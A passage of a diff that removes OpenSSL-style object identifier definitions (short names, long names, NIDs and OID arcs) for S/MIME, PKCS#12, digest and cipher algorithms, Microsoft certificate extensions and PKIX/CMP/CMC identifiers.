-#define SN_id_smime_spq_ets_sqt_uri		"id-smime-spq-ets-sqt-uri"
-#define NID_id_smime_spq_ets_sqt_uri		249
-#define OBJ_id_smime_spq_ets_sqt_uri		OBJ_id_smime_spq,1L
-
-#define SN_id_smime_spq_ets_sqt_unotice		"id-smime-spq-ets-sqt-unotice"
-#define NID_id_smime_spq_ets_sqt_unotice		250
-#define OBJ_id_smime_spq_ets_sqt_unotice		OBJ_id_smime_spq,2L
-
-#define SN_id_smime_cti_ets_proofOfOrigin		"id-smime-cti-ets-proofOfOrigin"
-#define NID_id_smime_cti_ets_proofOfOrigin		251
-#define OBJ_id_smime_cti_ets_proofOfOrigin		OBJ_id_smime_cti,1L
-
-#define SN_id_smime_cti_ets_proofOfReceipt		"id-smime-cti-ets-proofOfReceipt"
-#define NID_id_smime_cti_ets_proofOfReceipt		252
-#define OBJ_id_smime_cti_ets_proofOfReceipt		OBJ_id_smime_cti,2L
-
-#define SN_id_smime_cti_ets_proofOfDelivery		"id-smime-cti-ets-proofOfDelivery"
-#define NID_id_smime_cti_ets_proofOfDelivery		253
-#define OBJ_id_smime_cti_ets_proofOfDelivery		OBJ_id_smime_cti,3L
-
-#define SN_id_smime_cti_ets_proofOfSender		"id-smime-cti-ets-proofOfSender"
-#define NID_id_smime_cti_ets_proofOfSender		254
-#define OBJ_id_smime_cti_ets_proofOfSender		OBJ_id_smime_cti,4L
-
-#define SN_id_smime_cti_ets_proofOfApproval		"id-smime-cti-ets-proofOfApproval"
-#define NID_id_smime_cti_ets_proofOfApproval		255
-#define OBJ_id_smime_cti_ets_proofOfApproval		OBJ_id_smime_cti,5L
-
-#define SN_id_smime_cti_ets_proofOfCreation		"id-smime-cti-ets-proofOfCreation"
-#define NID_id_smime_cti_ets_proofOfCreation		256
-#define OBJ_id_smime_cti_ets_proofOfCreation		OBJ_id_smime_cti,6L
-
-#define LN_friendlyName		"friendlyName"
-#define NID_friendlyName		156
-#define OBJ_friendlyName		OBJ_pkcs9,20L
-
-#define LN_localKeyID		"localKeyID"
-#define NID_localKeyID		157
-#define OBJ_localKeyID		OBJ_pkcs9,21L
-
-#define SN_ms_csp_name		"CSPName"
-#define LN_ms_csp_name		"Microsoft CSP Name"
-#define NID_ms_csp_name		417
-#define OBJ_ms_csp_name		1L,3L,6L,1L,4L,1L,311L,17L,1L
-
-#define SN_LocalKeySet		"LocalKeySet"
-#define LN_LocalKeySet		"Microsoft Local Key set"
-#define NID_LocalKeySet		856
-#define OBJ_LocalKeySet		1L,3L,6L,1L,4L,1L,311L,17L,2L
-
-#define OBJ_certTypes		OBJ_pkcs9,22L
-
-#define LN_x509Certificate		"x509Certificate"
-#define NID_x509Certificate		158
-#define OBJ_x509Certificate		OBJ_certTypes,1L
-
-#define LN_sdsiCertificate		"sdsiCertificate"
-#define NID_sdsiCertificate		159
-#define OBJ_sdsiCertificate		OBJ_certTypes,2L
-
-#define OBJ_crlTypes		OBJ_pkcs9,23L
-
-#define LN_x509Crl		"x509Crl"
-#define NID_x509Crl		160
-#define OBJ_x509Crl		OBJ_crlTypes,1L
-
-#define OBJ_pkcs12		OBJ_pkcs,12L
-
-#define OBJ_pkcs12_pbeids		OBJ_pkcs12,1L
-
-#define SN_pbe_WithSHA1And128BitRC4		"PBE-SHA1-RC4-128"
-#define LN_pbe_WithSHA1And128BitRC4		"pbeWithSHA1And128BitRC4"
-#define NID_pbe_WithSHA1And128BitRC4		144
-#define OBJ_pbe_WithSHA1And128BitRC4		OBJ_pkcs12_pbeids,1L
-
-#define SN_pbe_WithSHA1And40BitRC4		"PBE-SHA1-RC4-40"
-#define LN_pbe_WithSHA1And40BitRC4		"pbeWithSHA1And40BitRC4"
-#define NID_pbe_WithSHA1And40BitRC4		145
-#define OBJ_pbe_WithSHA1And40BitRC4		OBJ_pkcs12_pbeids,2L
-
-#define SN_pbe_WithSHA1And3_Key_TripleDES_CBC		"PBE-SHA1-3DES"
-#define LN_pbe_WithSHA1And3_Key_TripleDES_CBC		"pbeWithSHA1And3-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And3_Key_TripleDES_CBC		146
-#define OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC		OBJ_pkcs12_pbeids,3L
-
-#define SN_pbe_WithSHA1And2_Key_TripleDES_CBC		"PBE-SHA1-2DES"
-#define LN_pbe_WithSHA1And2_Key_TripleDES_CBC		"pbeWithSHA1And2-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And2_Key_TripleDES_CBC		147
-#define OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC		OBJ_pkcs12_pbeids,4L
-
-#define SN_pbe_WithSHA1And128BitRC2_CBC		"PBE-SHA1-RC2-128"
-#define LN_pbe_WithSHA1And128BitRC2_CBC		"pbeWithSHA1And128BitRC2-CBC"
-#define NID_pbe_WithSHA1And128BitRC2_CBC		148
-#define OBJ_pbe_WithSHA1And128BitRC2_CBC		OBJ_pkcs12_pbeids,5L
-
-#define SN_pbe_WithSHA1And40BitRC2_CBC		"PBE-SHA1-RC2-40"
-#define LN_pbe_WithSHA1And40BitRC2_CBC		"pbeWithSHA1And40BitRC2-CBC"
-#define NID_pbe_WithSHA1And40BitRC2_CBC		149
-#define OBJ_pbe_WithSHA1And40BitRC2_CBC		OBJ_pkcs12_pbeids,6L
-
-#define OBJ_pkcs12_Version1		OBJ_pkcs12,10L
-
-#define OBJ_pkcs12_BagIds		OBJ_pkcs12_Version1,1L
-
-#define LN_keyBag		"keyBag"
-#define NID_keyBag		150
-#define OBJ_keyBag		OBJ_pkcs12_BagIds,1L
-
-#define LN_pkcs8ShroudedKeyBag		"pkcs8ShroudedKeyBag"
-#define NID_pkcs8ShroudedKeyBag		151
-#define OBJ_pkcs8ShroudedKeyBag		OBJ_pkcs12_BagIds,2L
-
-#define LN_certBag		"certBag"
-#define NID_certBag		152
-#define OBJ_certBag		OBJ_pkcs12_BagIds,3L
-
-#define LN_crlBag		"crlBag"
-#define NID_crlBag		153
-#define OBJ_crlBag		OBJ_pkcs12_BagIds,4L
-
-#define LN_secretBag		"secretBag"
-#define NID_secretBag		154
-#define OBJ_secretBag		OBJ_pkcs12_BagIds,5L
-
-#define LN_safeContentsBag		"safeContentsBag"
-#define NID_safeContentsBag		155
-#define OBJ_safeContentsBag		OBJ_pkcs12_BagIds,6L
-
-#define SN_md2		"MD2"
-#define LN_md2		"md2"
-#define NID_md2		3
-#define OBJ_md2		OBJ_rsadsi,2L,2L
-
-#define SN_md4		"MD4"
-#define LN_md4		"md4"
-#define NID_md4		257
-#define OBJ_md4		OBJ_rsadsi,2L,4L
-
-#define SN_md5		"MD5"
-#define LN_md5		"md5"
-#define NID_md5		4
-#define OBJ_md5		OBJ_rsadsi,2L,5L
-
-#define SN_md5_sha1		"MD5-SHA1"
-#define LN_md5_sha1		"md5-sha1"
-#define NID_md5_sha1		114
-
-#define LN_hmacWithMD5		"hmacWithMD5"
-#define NID_hmacWithMD5		797
-#define OBJ_hmacWithMD5		OBJ_rsadsi,2L,6L
-
-#define LN_hmacWithSHA1		"hmacWithSHA1"
-#define NID_hmacWithSHA1		163
-#define OBJ_hmacWithSHA1		OBJ_rsadsi,2L,7L
-
-#define LN_hmacWithSHA224		"hmacWithSHA224"
-#define NID_hmacWithSHA224		798
-#define OBJ_hmacWithSHA224		OBJ_rsadsi,2L,8L
-
-#define LN_hmacWithSHA256		"hmacWithSHA256"
-#define NID_hmacWithSHA256		799
-#define OBJ_hmacWithSHA256		OBJ_rsadsi,2L,9L
-
-#define LN_hmacWithSHA384		"hmacWithSHA384"
-#define NID_hmacWithSHA384		800
-#define OBJ_hmacWithSHA384		OBJ_rsadsi,2L,10L
-
-#define LN_hmacWithSHA512		"hmacWithSHA512"
-#define NID_hmacWithSHA512		801
-#define OBJ_hmacWithSHA512		OBJ_rsadsi,2L,11L
-
-#define SN_rc2_cbc		"RC2-CBC"
-#define LN_rc2_cbc		"rc2-cbc"
-#define NID_rc2_cbc		37
-#define OBJ_rc2_cbc		OBJ_rsadsi,3L,2L
-
-#define SN_rc2_ecb		"RC2-ECB"
-#define LN_rc2_ecb		"rc2-ecb"
-#define NID_rc2_ecb		38
-
-#define SN_rc2_cfb64		"RC2-CFB"
-#define LN_rc2_cfb64		"rc2-cfb"
-#define NID_rc2_cfb64		39
-
-#define SN_rc2_ofb64		"RC2-OFB"
-#define LN_rc2_ofb64		"rc2-ofb"
-#define NID_rc2_ofb64		40
-
-#define SN_rc2_40_cbc		"RC2-40-CBC"
-#define LN_rc2_40_cbc		"rc2-40-cbc"
-#define NID_rc2_40_cbc		98
-
-#define SN_rc2_64_cbc		"RC2-64-CBC"
-#define LN_rc2_64_cbc		"rc2-64-cbc"
-#define NID_rc2_64_cbc		166
-
-#define SN_rc4		"RC4"
-#define LN_rc4		"rc4"
-#define NID_rc4		5
-#define OBJ_rc4		OBJ_rsadsi,3L,4L
-
-#define SN_rc4_40		"RC4-40"
-#define LN_rc4_40		"rc4-40"
-#define NID_rc4_40		97
-
-#define SN_des_ede3_cbc		"DES-EDE3-CBC"
-#define LN_des_ede3_cbc		"des-ede3-cbc"
-#define NID_des_ede3_cbc		44
-#define OBJ_des_ede3_cbc		OBJ_rsadsi,3L,7L
-
-#define SN_rc5_cbc		"RC5-CBC"
-#define LN_rc5_cbc		"rc5-cbc"
-#define NID_rc5_cbc		120
-#define OBJ_rc5_cbc		OBJ_rsadsi,3L,8L
-
-#define SN_rc5_ecb		"RC5-ECB"
-#define LN_rc5_ecb		"rc5-ecb"
-#define NID_rc5_ecb		121
-
-#define SN_rc5_cfb64		"RC5-CFB"
-#define LN_rc5_cfb64		"rc5-cfb"
-#define NID_rc5_cfb64		122
-
-#define SN_rc5_ofb64		"RC5-OFB"
-#define LN_rc5_ofb64		"rc5-ofb"
-#define NID_rc5_ofb64		123
-
-#define SN_ms_ext_req		"msExtReq"
-#define LN_ms_ext_req		"Microsoft Extension Request"
-#define NID_ms_ext_req		171
-#define OBJ_ms_ext_req		1L,3L,6L,1L,4L,1L,311L,2L,1L,14L
-
-#define SN_ms_code_ind		"msCodeInd"
-#define LN_ms_code_ind		"Microsoft Individual Code Signing"
-#define NID_ms_code_ind		134
-#define OBJ_ms_code_ind		1L,3L,6L,1L,4L,1L,311L,2L,1L,21L
-
-#define SN_ms_code_com		"msCodeCom"
-#define LN_ms_code_com		"Microsoft Commercial Code Signing"
-#define NID_ms_code_com		135
-#define OBJ_ms_code_com		1L,3L,6L,1L,4L,1L,311L,2L,1L,22L
-
-#define SN_ms_ctl_sign		"msCTLSign"
-#define LN_ms_ctl_sign		"Microsoft Trust List Signing"
-#define NID_ms_ctl_sign		136
-#define OBJ_ms_ctl_sign		1L,3L,6L,1L,4L,1L,311L,10L,3L,1L
-
-#define SN_ms_sgc		"msSGC"
-#define LN_ms_sgc		"Microsoft Server Gated Crypto"
-#define NID_ms_sgc		137
-#define OBJ_ms_sgc		1L,3L,6L,1L,4L,1L,311L,10L,3L,3L
-
-#define SN_ms_efs		"msEFS"
-#define LN_ms_efs		"Microsoft Encrypted File System"
-#define NID_ms_efs		138
-#define OBJ_ms_efs		1L,3L,6L,1L,4L,1L,311L,10L,3L,4L
-
-#define SN_ms_smartcard_login		"msSmartcardLogin"
-#define LN_ms_smartcard_login		"Microsoft Smartcardlogin"
-#define NID_ms_smartcard_login		648
-#define OBJ_ms_smartcard_login		1L,3L,6L,1L,4L,1L,311L,20L,2L,2L
-
-#define SN_ms_upn		"msUPN"
-#define LN_ms_upn		"Microsoft Universal Principal Name"
-#define NID_ms_upn		649
-#define OBJ_ms_upn		1L,3L,6L,1L,4L,1L,311L,20L,2L,3L
-
-#define SN_idea_cbc		"IDEA-CBC"
-#define LN_idea_cbc		"idea-cbc"
-#define NID_idea_cbc		34
-#define OBJ_idea_cbc		1L,3L,6L,1L,4L,1L,188L,7L,1L,1L,2L
-
-#define SN_idea_ecb		"IDEA-ECB"
-#define LN_idea_ecb		"idea-ecb"
-#define NID_idea_ecb		36
-
-#define SN_idea_cfb64		"IDEA-CFB"
-#define LN_idea_cfb64		"idea-cfb"
-#define NID_idea_cfb64		35
-
-#define SN_idea_ofb64		"IDEA-OFB"
-#define LN_idea_ofb64		"idea-ofb"
-#define NID_idea_ofb64		46
-
-#define SN_bf_cbc		"BF-CBC"
-#define LN_bf_cbc		"bf-cbc"
-#define NID_bf_cbc		91
-#define OBJ_bf_cbc		1L,3L,6L,1L,4L,1L,3029L,1L,2L
-
-#define SN_bf_ecb		"BF-ECB"
-#define LN_bf_ecb		"bf-ecb"
-#define NID_bf_ecb		92
-
-#define SN_bf_cfb64		"BF-CFB"
-#define LN_bf_cfb64		"bf-cfb"
-#define NID_bf_cfb64		93
-
-#define SN_bf_ofb64		"BF-OFB"
-#define LN_bf_ofb64		"bf-ofb"
-#define NID_bf_ofb64		94
-
-#define SN_id_pkix		"PKIX"
-#define NID_id_pkix		127
-#define OBJ_id_pkix		1L,3L,6L,1L,5L,5L,7L
-
-#define SN_id_pkix_mod		"id-pkix-mod"
-#define NID_id_pkix_mod		258
-#define OBJ_id_pkix_mod		OBJ_id_pkix,0L
-
-#define SN_id_pe		"id-pe"
-#define NID_id_pe		175
-#define OBJ_id_pe		OBJ_id_pkix,1L
-
-#define SN_id_qt		"id-qt"
-#define NID_id_qt		259
-#define OBJ_id_qt		OBJ_id_pkix,2L
-
-#define SN_id_kp		"id-kp"
-#define NID_id_kp		128
-#define OBJ_id_kp		OBJ_id_pkix,3L
-
-#define SN_id_it		"id-it"
-#define NID_id_it		260
-#define OBJ_id_it		OBJ_id_pkix,4L
-
-#define SN_id_pkip		"id-pkip"
-#define NID_id_pkip		261
-#define OBJ_id_pkip		OBJ_id_pkix,5L
-
-#define SN_id_alg		"id-alg"
-#define NID_id_alg		262
-#define OBJ_id_alg		OBJ_id_pkix,6L
-
-#define SN_id_cmc		"id-cmc"
-#define NID_id_cmc		263
-#define OBJ_id_cmc		OBJ_id_pkix,7L
-
-#define SN_id_on		"id-on"
-#define NID_id_on		264
-#define OBJ_id_on		OBJ_id_pkix,8L
-
-#define SN_id_pda		"id-pda"
-#define NID_id_pda		265
-#define OBJ_id_pda		OBJ_id_pkix,9L
-
-#define SN_id_aca		"id-aca"
-#define NID_id_aca		266
-#define OBJ_id_aca		OBJ_id_pkix,10L
-
-#define SN_id_qcs		"id-qcs"
-#define NID_id_qcs		267
-#define OBJ_id_qcs		OBJ_id_pkix,11L
-
-#define SN_id_cct		"id-cct"
-#define NID_id_cct		268
-#define OBJ_id_cct		OBJ_id_pkix,12L
-
-#define SN_id_ppl		"id-ppl"
-#define NID_id_ppl		662
-#define OBJ_id_ppl		OBJ_id_pkix,21L
-
-#define SN_id_ad		"id-ad"
-#define NID_id_ad		176
-#define OBJ_id_ad		OBJ_id_pkix,48L
-
-#define SN_id_pkix1_explicit_88		"id-pkix1-explicit-88"
-#define NID_id_pkix1_explicit_88		269
-#define OBJ_id_pkix1_explicit_88		OBJ_id_pkix_mod,1L
-
-#define SN_id_pkix1_implicit_88		"id-pkix1-implicit-88"
-#define NID_id_pkix1_implicit_88		270
-#define OBJ_id_pkix1_implicit_88		OBJ_id_pkix_mod,2L
-
-#define SN_id_pkix1_explicit_93		"id-pkix1-explicit-93"
-#define NID_id_pkix1_explicit_93		271
-#define OBJ_id_pkix1_explicit_93		OBJ_id_pkix_mod,3L
-
-#define SN_id_pkix1_implicit_93		"id-pkix1-implicit-93"
-#define NID_id_pkix1_implicit_93		272
-#define OBJ_id_pkix1_implicit_93		OBJ_id_pkix_mod,4L
-
-#define SN_id_mod_crmf		"id-mod-crmf"
-#define NID_id_mod_crmf		273
-#define OBJ_id_mod_crmf		OBJ_id_pkix_mod,5L
-
-#define SN_id_mod_cmc		"id-mod-cmc"
-#define NID_id_mod_cmc		274
-#define OBJ_id_mod_cmc		OBJ_id_pkix_mod,6L
-
-#define SN_id_mod_kea_profile_88		"id-mod-kea-profile-88"
-#define NID_id_mod_kea_profile_88		275
-#define OBJ_id_mod_kea_profile_88		OBJ_id_pkix_mod,7L
-
-#define SN_id_mod_kea_profile_93		"id-mod-kea-profile-93"
-#define NID_id_mod_kea_profile_93		276
-#define OBJ_id_mod_kea_profile_93		OBJ_id_pkix_mod,8L
-
-#define SN_id_mod_cmp		"id-mod-cmp"
-#define NID_id_mod_cmp		277
-#define OBJ_id_mod_cmp		OBJ_id_pkix_mod,9L
-
-#define SN_id_mod_qualified_cert_88		"id-mod-qualified-cert-88"
-#define NID_id_mod_qualified_cert_88		278
-#define OBJ_id_mod_qualified_cert_88		OBJ_id_pkix_mod,10L
-
-#define SN_id_mod_qualified_cert_93		"id-mod-qualified-cert-93"
-#define NID_id_mod_qualified_cert_93		279
-#define OBJ_id_mod_qualified_cert_93		OBJ_id_pkix_mod,11L
-
-#define SN_id_mod_attribute_cert		"id-mod-attribute-cert"
-#define NID_id_mod_attribute_cert		280
-#define OBJ_id_mod_attribute_cert		OBJ_id_pkix_mod,12L
-
-#define SN_id_mod_timestamp_protocol		"id-mod-timestamp-protocol"
-#define NID_id_mod_timestamp_protocol		281
-#define OBJ_id_mod_timestamp_protocol		OBJ_id_pkix_mod,13L
-
-#define SN_id_mod_ocsp		"id-mod-ocsp"
-#define NID_id_mod_ocsp		282
-#define OBJ_id_mod_ocsp		OBJ_id_pkix_mod,14L
-
-#define SN_id_mod_dvcs		"id-mod-dvcs"
-#define NID_id_mod_dvcs		283
-#define OBJ_id_mod_dvcs		OBJ_id_pkix_mod,15L
-
-#define SN_id_mod_cmp2000		"id-mod-cmp2000"
-#define NID_id_mod_cmp2000		284
-#define OBJ_id_mod_cmp2000		OBJ_id_pkix_mod,16L
-
-#define SN_info_access		"authorityInfoAccess"
-#define LN_info_access		"Authority Information Access"
-#define NID_info_access		177
-#define OBJ_info_access		OBJ_id_pe,1L
-
-#define SN_biometricInfo		"biometricInfo"
-#define LN_biometricInfo		"Biometric Info"
-#define NID_biometricInfo		285
-#define OBJ_biometricInfo		OBJ_id_pe,2L
-
-#define SN_qcStatements		"qcStatements"
-#define NID_qcStatements		286
-#define OBJ_qcStatements		OBJ_id_pe,3L
-
-#define SN_ac_auditEntity		"ac-auditEntity"
-#define NID_ac_auditEntity		287
-#define OBJ_ac_auditEntity		OBJ_id_pe,4L
-
-#define SN_ac_targeting		"ac-targeting"
-#define NID_ac_targeting		288
-#define OBJ_ac_targeting		OBJ_id_pe,5L
-
-#define SN_aaControls		"aaControls"
-#define NID_aaControls		289
-#define OBJ_aaControls		OBJ_id_pe,6L
-
-#define SN_sbgp_ipAddrBlock		"sbgp-ipAddrBlock"
-#define NID_sbgp_ipAddrBlock		290
-#define OBJ_sbgp_ipAddrBlock		OBJ_id_pe,7L
-
-#define SN_sbgp_autonomousSysNum		"sbgp-autonomousSysNum"
-#define NID_sbgp_autonomousSysNum		291
-#define OBJ_sbgp_autonomousSysNum		OBJ_id_pe,8L
-
-#define SN_sbgp_routerIdentifier		"sbgp-routerIdentifier"
-#define NID_sbgp_routerIdentifier		292
-#define OBJ_sbgp_routerIdentifier		OBJ_id_pe,9L
-
-#define SN_ac_proxying		"ac-proxying"
-#define NID_ac_proxying		397
-#define OBJ_ac_proxying		OBJ_id_pe,10L
-
-#define SN_sinfo_access		"subjectInfoAccess"
-#define LN_sinfo_access		"Subject Information Access"
-#define NID_sinfo_access		398
-#define OBJ_sinfo_access		OBJ_id_pe,11L
-
-#define SN_proxyCertInfo		"proxyCertInfo"
-#define LN_proxyCertInfo		"Proxy Certificate Information"
-#define NID_proxyCertInfo		663
-#define OBJ_proxyCertInfo		OBJ_id_pe,14L
-
-#define SN_id_qt_cps		"id-qt-cps"
-#define LN_id_qt_cps		"Policy Qualifier CPS"
-#define NID_id_qt_cps		164
-#define OBJ_id_qt_cps		OBJ_id_qt,1L
-
-#define SN_id_qt_unotice		"id-qt-unotice"
-#define LN_id_qt_unotice		"Policy Qualifier User Notice"
-#define NID_id_qt_unotice		165
-#define OBJ_id_qt_unotice		OBJ_id_qt,2L
-
-#define SN_textNotice		"textNotice"
-#define NID_textNotice		293
-#define OBJ_textNotice		OBJ_id_qt,3L
-
-#define SN_server_auth		"serverAuth"
-#define LN_server_auth		"TLS Web Server Authentication"
-#define NID_server_auth		129
-#define OBJ_server_auth		OBJ_id_kp,1L
-
-#define SN_client_auth		"clientAuth"
-#define LN_client_auth		"TLS Web Client Authentication"
-#define NID_client_auth		130
-#define OBJ_client_auth		OBJ_id_kp,2L
-
-#define SN_code_sign		"codeSigning"
-#define LN_code_sign		"Code Signing"
-#define NID_code_sign		131
-#define OBJ_code_sign		OBJ_id_kp,3L
-
-#define SN_email_protect		"emailProtection"
-#define LN_email_protect		"E-mail Protection"
-#define NID_email_protect		132
-#define OBJ_email_protect		OBJ_id_kp,4L
-
-#define SN_ipsecEndSystem		"ipsecEndSystem"
-#define LN_ipsecEndSystem		"IPSec End System"
-#define NID_ipsecEndSystem		294
-#define OBJ_ipsecEndSystem		OBJ_id_kp,5L
-
-#define SN_ipsecTunnel		"ipsecTunnel"
-#define LN_ipsecTunnel		"IPSec Tunnel"
-#define NID_ipsecTunnel		295
-#define OBJ_ipsecTunnel		OBJ_id_kp,6L
-
-#define SN_ipsecUser		"ipsecUser"
-#define LN_ipsecUser		"IPSec User"
-#define NID_ipsecUser		296
-#define OBJ_ipsecUser		OBJ_id_kp,7L
-
-#define SN_time_stamp		"timeStamping"
-#define LN_time_stamp		"Time Stamping"
-#define NID_time_stamp		133
-#define OBJ_time_stamp		OBJ_id_kp,8L
-
-#define SN_OCSP_sign		"OCSPSigning"
-#define LN_OCSP_sign		"OCSP Signing"
-#define NID_OCSP_sign		180
-#define OBJ_OCSP_sign		OBJ_id_kp,9L
-
-#define SN_dvcs		"DVCS"
-#define LN_dvcs		"dvcs"
-#define NID_dvcs		297
-#define OBJ_dvcs		OBJ_id_kp,10L
-
-#define SN_id_it_caProtEncCert		"id-it-caProtEncCert"
-#define NID_id_it_caProtEncCert		298
-#define OBJ_id_it_caProtEncCert		OBJ_id_it,1L
-
-#define SN_id_it_signKeyPairTypes		"id-it-signKeyPairTypes"
-#define NID_id_it_signKeyPairTypes		299
-#define OBJ_id_it_signKeyPairTypes		OBJ_id_it,2L
-
-#define SN_id_it_encKeyPairTypes		"id-it-encKeyPairTypes"
-#define NID_id_it_encKeyPairTypes		300
-#define OBJ_id_it_encKeyPairTypes		OBJ_id_it,3L
-
-#define SN_id_it_preferredSymmAlg		"id-it-preferredSymmAlg"
-#define NID_id_it_preferredSymmAlg		301
-#define OBJ_id_it_preferredSymmAlg		OBJ_id_it,4L
-
-#define SN_id_it_caKeyUpdateInfo		"id-it-caKeyUpdateInfo"
-#define NID_id_it_caKeyUpdateInfo		302
-#define OBJ_id_it_caKeyUpdateInfo		OBJ_id_it,5L
-
-#define SN_id_it_currentCRL		"id-it-currentCRL"
-#define NID_id_it_currentCRL		303
-#define OBJ_id_it_currentCRL		OBJ_id_it,6L
-
-#define SN_id_it_unsupportedOIDs		"id-it-unsupportedOIDs"
-#define NID_id_it_unsupportedOIDs		304
-#define OBJ_id_it_unsupportedOIDs		OBJ_id_it,7L
-
-#define SN_id_it_subscriptionRequest		"id-it-subscriptionRequest"
-#define NID_id_it_subscriptionRequest		305
-#define OBJ_id_it_subscriptionRequest		OBJ_id_it,8L
-
-#define SN_id_it_subscriptionResponse		"id-it-subscriptionResponse"
-#define NID_id_it_subscriptionResponse		306
-#define OBJ_id_it_subscriptionResponse		OBJ_id_it,9L
-
-#define SN_id_it_keyPairParamReq		"id-it-keyPairParamReq"
-#define NID_id_it_keyPairParamReq		307
-#define OBJ_id_it_keyPairParamReq		OBJ_id_it,10L
-
-#define SN_id_it_keyPairParamRep		"id-it-keyPairParamRep"
-#define NID_id_it_keyPairParamRep		308
-#define OBJ_id_it_keyPairParamRep		OBJ_id_it,11L
-
-#define SN_id_it_revPassphrase		"id-it-revPassphrase"
-#define NID_id_it_revPassphrase		309
-#define OBJ_id_it_revPassphrase		OBJ_id_it,12L
-
-#define SN_id_it_implicitConfirm		"id-it-implicitConfirm"
-#define NID_id_it_implicitConfirm		310
-#define OBJ_id_it_implicitConfirm		OBJ_id_it,13L
-
-#define SN_id_it_confirmWaitTime		"id-it-confirmWaitTime"
-#define NID_id_it_confirmWaitTime		311
-#define OBJ_id_it_confirmWaitTime		OBJ_id_it,14L
-
-#define SN_id_it_origPKIMessage		"id-it-origPKIMessage"
-#define NID_id_it_origPKIMessage		312
-#define OBJ_id_it_origPKIMessage		OBJ_id_it,15L
-
-#define SN_id_it_suppLangTags		"id-it-suppLangTags"
-#define NID_id_it_suppLangTags		784
-#define OBJ_id_it_suppLangTags		OBJ_id_it,16L
-
-#define SN_id_regCtrl		"id-regCtrl"
-#define NID_id_regCtrl		313
-#define OBJ_id_regCtrl		OBJ_id_pkip,1L
-
-#define SN_id_regInfo		"id-regInfo"
-#define NID_id_regInfo		314
-#define OBJ_id_regInfo		OBJ_id_pkip,2L
-
-#define SN_id_regCtrl_regToken		"id-regCtrl-regToken"
-#define NID_id_regCtrl_regToken		315
-#define OBJ_id_regCtrl_regToken		OBJ_id_regCtrl,1L
-
-#define SN_id_regCtrl_authenticator		"id-regCtrl-authenticator"
-#define NID_id_regCtrl_authenticator		316
-#define OBJ_id_regCtrl_authenticator		OBJ_id_regCtrl,2L
-
-#define SN_id_regCtrl_pkiPublicationInfo		"id-regCtrl-pkiPublicationInfo"
-#define NID_id_regCtrl_pkiPublicationInfo		317
-#define OBJ_id_regCtrl_pkiPublicationInfo		OBJ_id_regCtrl,3L
-
-#define SN_id_regCtrl_pkiArchiveOptions		"id-regCtrl-pkiArchiveOptions"
-#define NID_id_regCtrl_pkiArchiveOptions		318
-#define OBJ_id_regCtrl_pkiArchiveOptions		OBJ_id_regCtrl,4L
-
-#define SN_id_regCtrl_oldCertID		"id-regCtrl-oldCertID"
-#define NID_id_regCtrl_oldCertID		319
-#define OBJ_id_regCtrl_oldCertID		OBJ_id_regCtrl,5L
-
-#define SN_id_regCtrl_protocolEncrKey		"id-regCtrl-protocolEncrKey"
-#define NID_id_regCtrl_protocolEncrKey		320
-#define OBJ_id_regCtrl_protocolEncrKey		OBJ_id_regCtrl,6L
-
-#define SN_id_regInfo_utf8Pairs		"id-regInfo-utf8Pairs"
-#define NID_id_regInfo_utf8Pairs		321
-#define OBJ_id_regInfo_utf8Pairs		OBJ_id_regInfo,1L
-
-#define SN_id_regInfo_certReq		"id-regInfo-certReq"
-#define NID_id_regInfo_certReq		322
-#define OBJ_id_regInfo_certReq		OBJ_id_regInfo,2L
-
-#define SN_id_alg_des40		"id-alg-des40"
-#define NID_id_alg_des40		323
-#define OBJ_id_alg_des40		OBJ_id_alg,1L
-
-#define SN_id_alg_noSignature		"id-alg-noSignature"
-#define NID_id_alg_noSignature		324
-#define OBJ_id_alg_noSignature		OBJ_id_alg,2L
-
-#define SN_id_alg_dh_sig_hmac_sha1		"id-alg-dh-sig-hmac-sha1"
-#define NID_id_alg_dh_sig_hmac_sha1		325
-#define OBJ_id_alg_dh_sig_hmac_sha1		OBJ_id_alg,3L
-
-#define SN_id_alg_dh_pop		"id-alg-dh-pop"
-#define NID_id_alg_dh_pop		326
-#define OBJ_id_alg_dh_pop		OBJ_id_alg,4L
-
-#define SN_id_cmc_statusInfo		"id-cmc-statusInfo"
-#define NID_id_cmc_statusInfo		327
-#define OBJ_id_cmc_statusInfo		OBJ_id_cmc,1L
-
-#define SN_id_cmc_identification		"id-cmc-identification"
-#define NID_id_cmc_identification		328
-#define OBJ_id_cmc_identification		OBJ_id_cmc,2L
-
-#define SN_id_cmc_identityProof		"id-cmc-identityProof"
-#define NID_id_cmc_identityProof		329
-#define OBJ_id_cmc_identityProof		OBJ_id_cmc,3L
-
-#define SN_id_cmc_dataReturn		"id-cmc-dataReturn"
-#define NID_id_cmc_dataReturn		330
-#define OBJ_id_cmc_dataReturn		OBJ_id_cmc,4L
-
-#define SN_id_cmc_transactionId		"id-cmc-transactionId"
-#define NID_id_cmc_transactionId		331
-#define OBJ_id_cmc_transactionId		OBJ_id_cmc,5L
-
-#define SN_id_cmc_senderNonce		"id-cmc-senderNonce"
-#define NID_id_cmc_senderNonce		332
-#define OBJ_id_cmc_senderNonce		OBJ_id_cmc,6L
-
-#define SN_id_cmc_recipientNonce		"id-cmc-recipientNonce"
-#define NID_id_cmc_recipientNonce		333
-#define OBJ_id_cmc_recipientNonce		OBJ_id_cmc,7L
-
-#define SN_id_cmc_addExtensions		"id-cmc-addExtensions"
-#define NID_id_cmc_addExtensions		334
-#define OBJ_id_cmc_addExtensions		OBJ_id_cmc,8L
-
-#define SN_id_cmc_encryptedPOP		"id-cmc-encryptedPOP"
-#define NID_id_cmc_encryptedPOP		335
-#define OBJ_id_cmc_encryptedPOP		OBJ_id_cmc,9L
-
-#define SN_id_cmc_decryptedPOP		"id-cmc-decryptedPOP"
-#define NID_id_cmc_decryptedPOP		336
-#define OBJ_id_cmc_decryptedPOP		OBJ_id_cmc,10L
-
-#define SN_id_cmc_lraPOPWitness		"id-cmc-lraPOPWitness"
-#define NID_id_cmc_lraPOPWitness		337
-#define OBJ_id_cmc_lraPOPWitness		OBJ_id_cmc,11L
-
-#define SN_id_cmc_getCert		"id-cmc-getCert"
-#define NID_id_cmc_getCert		338
-#define OBJ_id_cmc_getCert		OBJ_id_cmc,15L
-
-#define SN_id_cmc_getCRL		"id-cmc-getCRL"
-#define NID_id_cmc_getCRL		339
-#define OBJ_id_cmc_getCRL		OBJ_id_cmc,16L
-
-#define SN_id_cmc_revokeRequest		"id-cmc-revokeRequest"
-#define NID_id_cmc_revokeRequest		340
